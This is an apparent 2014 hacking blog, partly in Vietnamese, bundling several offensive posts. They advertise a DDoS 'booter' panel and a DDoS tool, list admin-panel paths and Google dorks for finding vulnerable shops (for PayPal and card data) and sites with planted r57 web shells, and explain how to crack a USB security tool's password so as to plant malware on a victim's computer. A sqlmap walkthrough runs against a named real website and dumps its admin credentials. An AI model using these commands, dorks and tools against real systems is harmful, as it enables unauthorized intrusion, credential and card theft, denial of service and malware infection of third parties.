Thursday, November 13, 2014

Re-Boot V4 (Paradooter) Source

Re-Boot V4 (Paradooter) Source



Details/Features

Ajax support for a much nicer user experience
Homepage with news
Account settings (change password/email)

Admin features

Settings: change booter name, cooldown system, ip blacklist, booter statistics and more
Shells: add/manage shells
Users: add/delete/edit users
News: add/delete news



Pictures demo






10 Tools SQLi best 2014

10 Tools SQLi best 2014


1.BSQL Hacker

This is a useful tool for both experts and beginners that automates SQL Injection attacks on websites.

2. The Mole

This is an SQL Injection tool that uses the union technique or the boolean query-based technique.

3. Pangolin

This is a penetration testing tool developed by NOSEC. It is aimed at detecting and exploiting SQL injection vulnerabilities on websites.

4. SQLMap

This is an open source penetration testing tool that security professionals can use. Like the BSQL Hacker tool, this one also automates SQL Injection attacks.

5. Havij

This is an automated SQL injection tool that can be used by penetration testers in order to detect vulnerabilities in web applications and exploit them.

6. Enema SQLi

This is a dynamic penetration testing tool for professionals. It is an auto-hacking software.

7. Sqlninja
This is a tool targeted at exploiting SQL injection vulnerabilities. It uses the Microsoft SQL server as its back end.

8. Sqlsus

Written using the Perl programming language, this is an open source penetration testing tool for MySQL Injection and takeover.

9. Safe3 SQL Injector

This is a powerful penetration testing tool, which automates the process of detecting and exploiting SQL Injection vulnerabilities.

10. SQL Poizon
This tool includes php , asp , rfi , lfi dorks that can be used for penetration testing

End.

Ninja DDoser

Ninja DDoser


Virus Scan:

Archivo: Ninja DDosser.exe
SHA1: c65c463436e654151facc181d26a38dc6d5
Fecha scan: 05-12-12,08:05:12
Reporte generado por maarayaa.com
Resultado: 2 de 35

AVG Free Clean
ArcaVir Clean
Avast 5 Clean
AntiVir (Avira) Clean
BitDefender Clean
VirusBuster Internet Security Clean
Clam Antivirus Clean
COMODO Internet Security Clean
Dr.Web Clean
eTrust-Vet Clean
F-PROT Antivirus Clean
F-Secure Internet Security Clean
G Data Clean
IKARUS Security Clean
Kaspersky Antivirus Clean
McAfee Clean
MS Security Essentials Clean
ESET NOD32 Clean
Norman Clean
Norton Antivirus Clean
Panda Security Clean
A-Squared Clean
Quick Heal Antivirus Clean
Solo Antivirus Clean
Sophos Clean
Trend Micro Internet Security Clean
VBA32 Antivirus Clean
Vexira Antivirus Clean
Zoner AntiVirus Clean
Ad-Aware Trojan.Win32.Generic.pak!cobra
BullGuard Clean
Immunet Antivirus Clean
K7 Ultimate Clean
NANO Antivirus Clean
VIPRE Trojan.Win32.Generic.pak=21cobra


Dorks To Find Admin Cpanel Page

D

inurl:"admin1.php"

  1. admin1.php
  2. admin1.html
  3. admin2.php
  4. admin2.html
  5. yonetim.php
  6. yonetim.html
  7. yonetici.php
  8. yonetici.html
  9. admin/account.php
  10. admin/account.html
  11. admin/index.php
  12. admin/index.html
  13. admin/login.php
  14. admin/login.html
  15. admin/home.php
  16. admin/controlpanel.html
  17. admin/controlpanel.php
  18. admin.php
  19. admin.html
  20. admin/cp.php
  21. admin/cp.html
  22. cp.php
  23. cp.html
  24. administrator/
  25. administrator/index.html
  26. administrator/index.php
  27. administrator/login.html
  28. administrator/login.php
  29. administrator/account.html
  30. administrator/account.php
  31. administrator.php
  32. administrator.html
  33. login.html
  34. modelsearch/login.php
  35. moderator.php
  36. moderator.html
  37. moderator/login.php
  38. moderator/login.html
  39. moderator/admin.php
  40. moderator/admin.html
  41. account.php
  42. account.html
  43. controlpanel/
  44. controlpanel.php
  45. controlpanel.html
  46. admincontrol.php
  47. admincontrol.html
  48. adminpanel.php
  49. adminpanel.html
  50. admin1.asp
  51. admin2.asp
  52. yonetim.asp
  53. yonetici.asp
  54. admin/account.asp
  55. admin/index.asp
  56. admin/login.asp
  57. admin/home.asp
  58. admin/controlpanel.asp
  59. admin.asp
  60. admin/cp.asp
  61. cp.asp
  62. administrator/index.asp
  63. administrator/login.asp
  64. administrator/account.asp
  65. administrator.asp
  66. login.asp
  67. modelsearch/login.asp
  68. moderator.asp
  69. moderator/login.asp
  70. moderator/admin.asp
  71. account.asp
  72. controlpanel.asp
  73. admincontrol.asp
  74. adminpanel.asp
  75. fileadmin/
  76. fileadmin.php
  77. fileadmin.asp
  78. fileadmin.html
  79. administration/
  80. administration.php
  81. administration.html
  82. sysadmin.php
  83. sysadmin.html
  84. phpmyadmin/
  85. myadmin/
  86. sysadmin.asp
  87. sysadmin/
  88. ur-admin.asp
  89. ur-admin.php
  90. ur-admin.html
  91. ur-admin/
  92. Server.php
  93. Server.html
  94. Server.asp
  95. Server/
  96. wp-admin/
  97. administr8.php
  98. administr8.html
  99. administr8/
  100. administr8.asp
  101. webadmin/
  102. webadmin.php
  103. webadmin.asp
  104. webadmin.html
  105. administratie/
  106. admins/
  107. admins.php
  108. admins.asp
  109. admins.html
  110. administrivia/
  111. Database_Administration/
  112. WebAdmin/
  113. useradmin/
  114. sysadmins/
  115. admin1/
  116. system-administration/
  117. administrators/
  118. pgadmin/
  119. directadmin/
  120. staradmin/
  121. ServerAdministrator/
  122. SysAdmin/
  123. administer/
  124. LiveUser_Admin/
  125. sys-admin/
  126. typo3/
  127. panel/
  128. cpanel/
  129. cPanel/
  130. cpanel_file/
  131. platz_login/
  132. rcLogin/
  133. blogindex/
  134. formslogin/
  135. autologin/
  136. support_login/
  137. meta_login/
  138. manuallogin/
  139. simpleLogin/
  140. loginflat/
  141. utility_login/
  142. showlogin/
  143. memlogin/
  144. members/
  145. login-redirect/
  146. sub-login/
  147. wp-login/
  148. login1/
  149. dir-login/
  150. login_db/
  151. xlogin/
  152. smblogin/
  153. customer_login/
  154. UserLogin/
  155. login-us/
  156. acct_login/
  157. admin_area/
  158. bigadmin/
  159. project-admins/
  160. phppgadmin/
  161. pureadmin/
  162. sql-admin/
  163. openvpnadmin/
  164. wizmysqladmin/
  165. vadmind/
  166. ezsqliteadmin/
  167. hpwebjetadmin/
  168. newsadmin/
  169. adminpro/
  170. Lotus_Domino_Admin/
  171. bbadmin/
  172. vmailadmin/
  173. ccp14admin/
  174. irc-macadmin/
  175. banneradmin/
  176. sshadmin/
  177. phpldapadmin/
  178. macadmin/
  179. administratoraccounts/
  180. admin4_account/
  181. admin4_colon/
  182. radmind-1/
  183. Super-Admin/
  184. AdminTools/
  185. cmsadmin/
  186. phpSQLiteAdmin/
  187. server_admin_small/
  188. database_administration/
  189. system_administration/

How To Hack USB Disk Security

 How To Hack USB Disk Security


USB Disk Security là một phần mềm ngăn chặn các truy cập trái phép của ổ đĩa USB có nghĩa là bạn không thể sao chép bất kỳ tập tin từ máy tính vào USB của bạn hoặc từ USB của bạn vào máy tính. Ngoài ra nó phát hiện hầu hết các loại virus ở trong ổ đĩa Flash mà ngày nay được gọi là ổ đĩa CD/DVD. Và trong thế giới hiện đại ngày nay hầu hết tất cả mọi người đều sử dụng nó. Vì vậy nếu bạn muốn cài 1 Malware hoặc bất cứ thứ gì vào máy tính của ai đó để đánh cắp thông tin từ máy tính của của nạn nhân, nhưng phần mềm này sẽ không cho phép bạn làm bất cứ điều gì, nó sẽ nhắc bạn điền 1 mật khẩu nào đó. Nếu bạn ngồi đoán mò, hên xui thì có thể ra còn không thì rất mất thời gian.


Cho nên trong bài viết lần này sẽ có 1 cái thủ thuật nho nhỏ giúp các bạn crack

 *Tiến Hành
- Ẩn tổ hợp phím Windows + R để mở hộp thoại Run và gõ regedit
- Chọn HKEY_LOCAL_MACHINE/SOFTWARE/ZbshaLab/USBGuard



* Ở đây có file: pwd =>> Chính là mật khẩu ta cần tìm
- Nhấn đúp chuột vào pwd ta được mã MD5:


- Cuối cùng các bạn crack mã MD5 ra ta sẽ có được kết quả 


END TUTORIAL




Sunday, November 9, 2014

Dork pp + cc.

Dork pp + cc.

________________________________________________________________________________
  • inurl:".php?cat="+intext:"Paypal"+site:UK

  • inurl:".php?cat="+intext:"/Buy Now/"+site:.net

  • inurl:".php?cid="+intext:"online+betting"

  • inurl:".php?id=" intext:"View cart"

  • inurl:".php?id=" intext:"Buy Now"

  • inurl:".php?id=" intext:"add to cart"

  • inurl:".php?id=" intext:"shopping"

  • inurl:".php?id=" intext:"boutique"

  • inurl:".php?id=" intext:"/store/"

  • inurl:".php?id=" intext:"/shop/"

  • inurl:".php?id=" intext:"toys"

  • inurl:".php?cid="

  • inurl:".php?cid=" intext:"shopping"

  • inurl:".php?cid=" intext:"add to cart"

  • inurl:".php?cid=" intext:"Buy Now"

  • inurl:".php?cid=" intext:"View cart"

  • inurl:".php?cid=" intext:"boutique

  • inurl:".php?cid=" intext:"/store/"

  • inurl:".php?cid=" intext:"/shop/"

  • inurl:".php?cid=" intext:"Toys"

  • inurl:".php?cat="

  • inurl:".php?cat=" intext:"shopping"

  • inurl:".php?cat=" intext:"add to cart"

  • inurl:".php?cat=" intext:"Buy Now"

  • inurl:".php?cat=" intext:"View cart"

  • inurl:".php?cat=" intext:"boutique

  • " inurl:".php?cat=" intext:"/store/"

  • inurl:".php?cat=" intext:"/shop/"

  • inurl:".php?cat=" intext:"Toys"

  • inurl:".php?catid="

  • inurl:".php?catid=" intext:"View cart"

  • inurl:".php?catid=" intext:"Buy Now"

  • inurl:".php?catid=" intext:"add to cart"

  • inurl:".php?catid=" intext:"shopping"

  • inurl:".php?catid=" intext:"boutique"

  • inurl:".php?catid=" intext:"/store/"

  • inurl:".php?catid=" intext:"/shop/"

  • inurl:".php?catid=" intext:"Toys"

  • inurl:".php?categoryid="

  • inurl:".php?categoryid=" intext:"View cart"

  • inurl:".php?categoryid=" intext:"Buy Now"

  • inurl:".php?categoryid=" intext:"add to cart"

  • inurl:".php?categoryid=" intext:"shopping"

  • inurl:".php?categoryid=" intext:"boutique"

  • inurl:".php?categoryid=" intext:"/store/"

  • inurl:".php?categoryid=" intext:"/shop/"

  • inurl:".php?categoryid=" intext:"Toys"

  • inurl:".php?pid="

  • inurl:".php?pid=" intext:"shopping"

  • inurl:".php?pid=" intext:"add to cart"

  • inurl:".php?pid=" intext:"Buy Now"

  • inurl:".php?pid=" intext:"View cart"

  • inurl:".php?pid=" intext:"boutique"
________________________________________________________________________________

Syslogger admin Finder new 2014

Syslogger admin Finder_new 2014



link download : http://upfile.vn/xgLgKrZm7QBm/1337-admin-p4ge-find3r-exe.html
link download 2: https://hostr.co/pKKcTse5SP1R

SQLMAP CƠ BẢN

SQLMAP CƠ BẢN


Demo: link lỗi sqli 
http://autohoabinh.com/?page=products_detail&id=296&catid=2'
Vào thư mục chưa bộ công cụ sqlmap
cd /pentest/database/sqlmap/
đầu tiên ta get database nhé

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" --dbs



ở đây --dbs là databases
thêm 1 số cái nữa như
--dbs DBMS databases
--tables DBMS database tables
--columns DBMS database table columns
--schema DBMS schema
--dump dump dữ liệu

Database nhận đc là athb_db nhé.​
tiếp tục ta get các table như sau

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db --tables




table tbl_admin là table chúng ta cần khai thác đúng hok nào,giờ ta lấy các column nhé​

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin --columns




kết quả nhận đc như sau​





bây giờ ta sẽ dump các trường id,name và pass nhé.​ta dump trường id trước nào

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C id --dump



kết quả nhận đc là id ->1 .tương tự ta dump các trường còn lại ​

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C name --dump



kết quả nhận đc thì user là admin nhé​

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C pass --dump



end tutorial.

Dork shell 2014

Dork shell 2014

  1. safe-mode: off (not secure) drwxrwxrwx r57shell
  2. inurl:r57.php
  3. inurl:r57.php uid=0(root)
  4. root r57.php
  5. "Captain Crunch Security Team" inurl:r57
  6. inurl:r57.php
  7. allinurl: r57.php
  8. inurl:r57.php
  9. inurl:"r57.php" r57shell
  10. inurl:r57.php uid=0(root)
  11. r57shell powered by admin
  12. r57shell powered by admin
  13. inurl:"/r57.php"
  14. inurl:r57.php
  15. r57 shell v.1.0 (roots)
  16. inurl:r57.php
  17. allintitle: "r57shell"
  18. inurl:"r57.php
  19. allinurl: "r57.php"
  20. inurl:r57.php
  21. intitle:r57Shell v. 1.0 pre-release +uname
  22. allinurl: "r57.php"
  23. inurl:r57.php
  24. inurl:"r57.php" r57shell
  25. inurl:"/r57.php
  26. inurl:/r57.php+uname
  27. allinurl:"r57.php"
  28. inurl:"r57.php"
  29. allinurl:r57.php
  30. "inurl:r57..php"
  31. r57shell [file on secure ok ]?
  32. powered by Captain Crunch Security Team
  33. allinurl:r57.php
  34. "r57.php" filetype:php
  35. allinurl:r57.php
  36. inurl:r57.php
  37. allinurl:.r57.php
  38. "inurl:r57.php"
  39. r57. PHP-code Feedback Self remove
  40. allinurl:r57.php
  41. download r57.php
  42. allinurl:r57.php
  43. inurl:r57.php
  44. allinurl: "r57.php"
  45. intitle:r57Shell v. 1.0 pre-release +uname
  46. allinurl:"r57.php"
  47. inurl:r57.php
  48. safe-mode: off (not secure) drwxrwxrwx r57shell
  49. r57.php download
  50. inurl:r57.php
  51. r57shell filetype:php -echo
  52. inurl:"r57.php"
  53. inurl:r57.php uid=0(root)
  54. allinurl:r57.php
  55. inurl:"/r57.php" intitle:"r57shell"
  56. r57Shell v. 1.0 pre-release build #5
  57. --[ r57shell v. 1.0 pre-release build #16
  58. r57shell linux infong
  59. r57Shell v. 1.0 pre-release build
  60. !r57Shell v. 1.0 beta!
  61. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  62. !r57shell v. 1+Safe-mode: OFF (not secure)
  63. "r57Shell v. 1.0 pre-release build "
  64. intitle:r57shell +filetype:php
  65. inurl:r57.php
  66. intitle:r57Shell v. 1.0 pre-release +uname
  67. intitle:!r57Shell v. 1.0 pre-release build #16! root
  68. !r57Shell v. 1.0 pre-release build #5!
  69. inurl:"r57.php"
  70. r57Shell v. 1.0 pre-release build #16!
  71. intitle:r57shell intext:uname
  72. allintext:r57Shell v. 1.0 pre-release build #12
  73. r57shell v. 1.0 pre-release build #16
  74. --[ r57shell v. 1.0 pre-release build #15 | Powered by ]--
  75. allinurl: "r57.php"
  76. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  77. "r57shell v 1.0"
  78. ftp apache inurl:r57.php
  79. r57shell+v.+1.0 16
  80. r57Shell v. 1.0 pre-release build #16 download
  81. intitle:r57shell "Software: Apache"
  82. allinurl: r57.php
  83. allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
  84. intitle:r57shell uname -bbpress
  85. intitle:"index.of" r57.php
  86. inurl:admin/files/
  87. intitle:"index of /" "r57.php"
  88. intitle:"index of" intext:r57.php
  89. intitle:index.of r57.php
  90. intitle:"index of" + r57.php
  91. intitle:index/of file r57.php
  92. intitle:index/of file r57.php
  93. index of /admin/files/
  94. intitle:"Index of/"+r57.php
  95. r57.php "intitle:Index of "
  96. intitle:index.of r57.php
  97. img/r57.php
  98. intitle:index.of r57.php
  99. img.r57.php
  100. intitle:"Index of/"+r57.php
  101. "index of /" r57.php
  102. r57.php
  103. intitle:"Index of" r57.php
  104. "index of" r57.php
  105. "Index of/"+r57.php